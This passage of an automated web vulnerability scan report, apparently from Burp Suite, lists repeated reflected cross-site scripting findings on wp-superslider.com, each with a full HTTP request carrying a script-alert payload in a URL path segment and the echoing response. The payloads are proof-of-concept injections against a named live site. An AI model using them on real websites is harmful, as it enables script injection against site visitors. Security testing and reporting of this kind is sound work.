<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/pluginsa8332\"><script>alert(1)</script>7ad48b4bc3b/superslider-show/plugin-data/superslider/ssShow/default/default.css" />
...[SNIP]...

4.254. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a062d"><script>alert(1)</script>5479a44adae was submitted in the REST URL parameter 4. This input was echoed as a062d\"><script>alert(1)</script>5479a44adae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-showa062d"><script>alert(1)</script>5479a44adae/plugin-data/superslider/ssShow/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674565+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674566; expires=Thu, 02-Feb-2012 19:22:46 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-showa062d\"><script>alert(1)</script>5479a44adae/plugin-data/superslider/ssShow/default/default.css" />
...[SNIP]...

4.255. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf811"><script>alert(1)</script>3f0521f2648 was submitted in the REST URL parameter 5. This input was echoed as cf811\"><script>alert(1)</script>3f0521f2648 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/plugin-datacf811"><script>alert(1)</script>3f0521f2648/superslider/ssShow/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674567+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/plugin-datacf811\"><script>alert(1)</script>3f0521f2648/superslider/ssShow/default/default.css" />
...[SNIP]...

4.256. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c16c7"><script>alert(1)</script>0518058665f was submitted in the REST URL parameter 6. This input was echoed as c16c7\"><script>alert(1)</script>0518058665f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/plugin-data/supersliderc16c7"><script>alert(1)</script>0518058665f/ssShow/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/plugin-data/supersliderc16c7\"><script>alert(1)</script>0518058665f/ssShow/default/default.css" />
...[SNIP]...

4.257. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb0ac"><script>alert(1)</script>6823b746046 was submitted in the REST URL parameter 7. This input was echoed as cb0ac\"><script>alert(1)</script>6823b746046 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShowcb0ac"><script>alert(1)</script>6823b746046/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:51 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674571+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShowcb0ac\"><script>alert(1)</script>6823b746046/default/default.css" />
...[SNIP]...

4.258. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7485"><script>alert(1)</script>4c6d54f9ffe was submitted in the REST URL parameter 8. This input was echoed as f7485\"><script>alert(1)</script>4c6d54f9ffe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/defaultf7485"><script>alert(1)</script>4c6d54f9ffe/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674574+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674574; expires=Thu, 02-Feb-2012 19:22:54 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/defaultf7485\"><script>alert(1)</script>4c6d54f9ffe/default.css" />
...[SNIP]...

4.259. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d29d"><script>alert(1)</script>086bd3cb201 was submitted in the REST URL parameter 9. This input was echoed as 6d29d\"><script>alert(1)</script>086bd3cb201 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css6d29d"><script>alert(1)</script>086bd3cb201 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:55 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674576+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674576; expires=Thu, 02-Feb-2012 19:22:56 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:56 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css6d29d\"><script>alert(1)</script>086bd3cb201" />
...[SNIP]...

4.260. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c215d"><script>alert(1)</script>2a891610468 was submitted in the REST URL parameter 1. This input was echoed as c215d\"><script>alert(1)</script>2a891610468 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitec215d"><script>alert(1)</script>2a891610468/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:43 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/sitec215d\"><script>alert(1)</script>2a891610468/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css" />
...[SNIP]...

4.261. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34007"><script>alert(1)</script>c24b863bac was submitted in the REST URL parameter 2. This input was echoed as 34007\"><script>alert(1)</script>c24b863bac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content34007"><script>alert(1)</script>c24b863bac/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content34007\"><script>alert(1)</script>c24b863bac/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css" />
...[SNIP]...

4.262. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 888b9"><script>alert(1)</script>1856c8b9929 was submitted in the REST URL parameter 3. This input was echoed as 888b9\"><script>alert(1)</script>1856c8b9929 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins888b9"><script>alert(1)</script>1856c8b9929/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674567+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins888b9\"><script>alert(1)</script>1856c8b9929/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css" />
...[SNIP]...

4.263. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 744e0"><script>alert(1)</script>c4cb7786a57 was submitted in the REST URL parameter 4. This input was echoed as 744e0\"><script>alert(1)</script>c4cb7786a57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show744e0"><script>alert(1)</script>c4cb7786a57/plugin-data/superslider/ssShow/lightbox/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674570+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674570; expires=Thu, 02-Feb-2012 19:22:50 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show744e0\"><script>alert(1)</script>c4cb7786a57/plugin-data/superslider/ssShow/lightbox/lightbox.css" />
...[SNIP]...

4.264. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 479a5"><script>alert(1)</script>22d092f232f was submitted in the REST URL parameter 5. This input was echoed as 479a5\"><script>alert(1)</script>22d092f232f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/plugin-data479a5"><script>alert(1)</script>22d092f232f/superslider/ssShow/lightbox/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674573+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674573; expires=Thu, 02-Feb-2012 19:22:53 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/plugin-data479a5\"><script>alert(1)</script>22d092f232f/superslider/ssShow/lightbox/lightbox.css" />
...[SNIP]...

4.265. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0d53"><script>alert(1)</script>fd42f611c98 was submitted in the REST URL parameter 6. This input was echoed as a0d53\"><script>alert(1)</script>fd42f611c98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/plugin-data/superslidera0d53"><script>alert(1)</script>fd42f611c98/ssShow/lightbox/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
